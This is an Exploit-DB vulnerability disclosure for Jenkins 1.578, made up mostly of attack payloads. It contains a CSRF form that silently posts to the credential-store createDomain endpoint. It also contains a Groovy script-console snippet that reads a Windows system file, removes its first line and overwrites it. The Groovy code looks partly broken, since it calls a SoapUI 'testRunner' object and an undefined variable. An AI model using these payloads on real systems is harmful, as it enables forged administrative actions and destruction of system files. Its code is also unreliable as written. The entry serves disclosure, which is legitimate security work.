Jenkins 1.578 - Multiple Vulnerabilities

EDB-ID:

34587

CVE:



Author:

JoeV

Type:

webapps


Platform:

Multiple

Date:

2014-09-08


#Affected Vendor: http://jenkins-ci.org/
#Date: 03/09/2014
#Discovered by: JoeV
#Type of vulnerability: CSRF and Command Execution

#Tested on: Windows 7
#Version : 1.578

#Description: Jenkins is susceptible to CSRF attack and command
execution. Using groovy one can fire any command and get it executed
by the script console thus able to access files, registry keys, values
and folders which is outbound for Jenkins.


#CSRF

--------

#Payload:

<form method="POST" name="form0"
action="http://localhost:8090/credential-store/createDomain">

<input type="hidden" name="_.name" value="xyz"/>
<input type="hidden" name="description" value="abc"/>
<input type="hidden" name="json" value="{'name': 'xyz', 'description': 'abc'}"/>
<input type="hidden" name="Submit" value="OK"/>
</form>


Command Execution (/script)
-------------------------------------
ArrayList pids = null
PrintWriter writer = null

File f = new File("C:/Windows/System32/Services.msc")

if (f.length() > 0){
   pids = new ArrayList()
   f.eachLine { line -> pids.add(line) }
   println("Item to be removed: " + pids.get(0))
   testRunner.testCase.setPropertyValue( "personId", pid )
   pids.remove(0)
   println pids
   writer = new PrintWriter(f)
   pids.each { id -> writer.println(id) }
   writer.close()
}
else{
   println "Null"
    }

-- 
Regards,

*Joel V*